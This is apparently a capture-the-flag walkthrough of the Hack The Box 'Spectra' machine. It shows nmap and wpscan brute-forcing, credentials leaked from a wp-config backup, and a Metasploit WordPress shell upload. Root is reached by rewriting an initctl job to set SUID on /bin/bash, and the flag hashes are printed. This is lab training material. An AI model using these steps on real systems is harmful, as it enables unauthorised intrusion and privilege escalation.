I start off with an nmap scan:
└─# nmap -sC -sV -A 10.10.10.229
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-21 04:02 EAT
Nmap scan report for spectra.htb (10.10.10.229)
Host is up (0.25s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE          VERSION
22/tcp   open  ssh              OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey: 
|_  4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp   open  http             nginx 1.17.4
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn't have a title (text/html).
3306/tcp open  mysql            MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
8081/tcp open  blackice-icecap?
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Fri, 21 May 2021 01:14:12 GMT
|     Connection: close
|     Hello World
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Fri, 21 May 2021 01:14:11 GMT
|     Connection: close
|     Hello World
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Content-Type: text/plain
|     Date: Fri, 21 May 2021 01:14:19 GMT
|     Connection: close
|_    Hello World

└─# wpscan --url http://10.10.10.229/main
http://spectra.htb/main/wp-login.php
└─# wpscan --url http://10.10.10.229/main --passwords /usr/share/wordlists/rockyou.txt --usernames administrator

view-source:http://spectra.htb/testing/wp-config.php.save
/** The name of the database for WordPress */
define( 'DB_NAME', 'dev' );

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

Try to login on http://spectra.htb/main/wp-login.php using administrator : devteam01. This is successful.
Uploading a reverse shell
└─# msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
/bin/sh -i
$ cd autologin
$ pwd
/etc/autologin
$ ls
passwd
$ cat passwd
SummerHereWeCome!!

Trying to ssh as katie:
ssh katie@10.10.10.229 : SummerHereWeCome!!
katie@spectra ~ $ id
uid=20156(katie) gid=20157(katie) groups=20157(katie),20158(developers)
katie@spectra ~ $ ls
log  user.txt
katie@spectra ~ $ cat user.txt 
e89d27fe195e9114ffa72ba8913a6130

==========Priv Escalation=====================
katie@spectra ~/log $ sudo -l
User katie may run the following commands on spectra:
    (ALL) SETENV: NOPASSWD: /sbin/initctl
----------------------------------------------
katie@spectra /etc/init $ cat test.conf
description "Test node.js server"
author      "katie"

start on filesystem or runlevel [2345]
stop on shutdown

script

    export HOME="/srv"
    echo $$ > /var/run/nodetest.pid
    exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js

end script

pre-start script
    echo "[`date`] Node Test Starting" >> /var/log/nodetest.log
end script

pre-stop script
    rm /var/run/nodetest.pid
    echo "[`date`] Node Test Stopping" >> /var/log/nodetest.log
end script
--------------------------------------
Modified script
katie@spectra /tmp $ cat test4
katie@spectra /etc/init $ cat test.conf
description "Test node.js server"
author      "katie"

start on filesystem or runlevel [2345]
stop on shutdown

script

    chmod +s /bin/bash

end script

Reference at : https://isharaabeythissa.medium.com/sudo-privileges-at-initctl-privileges-escalation-technique-ishara-abeythissa-c9d44ccadcb9
└─# ssh katie@10.10.10.229
Password: 
-bash-4.3$ id
uid=20156(katie) gid=20157(katie) groups=20157(katie),20158(developers)
-bash-4.3$ ls
log  user.txt
-bash-4.3$ cat user.txt
e89d27fe195e9114ffa72ba8913a6130
-bash-4.3$ sudo /sbin/initctl start test2
test2 start/running, process 68755
-bash-4.3$ /bin/bash -p
bash-4.3# id
uid=20156(katie) gid=20157(katie) euid=0(root) egid=0(root) groups=0(root),20157(katie),20158(developers)
bash-4.3# whoami
root
bash-4.3# cat /root/root.txt
d44519713b889d5e1f9e536d0c6df2fc
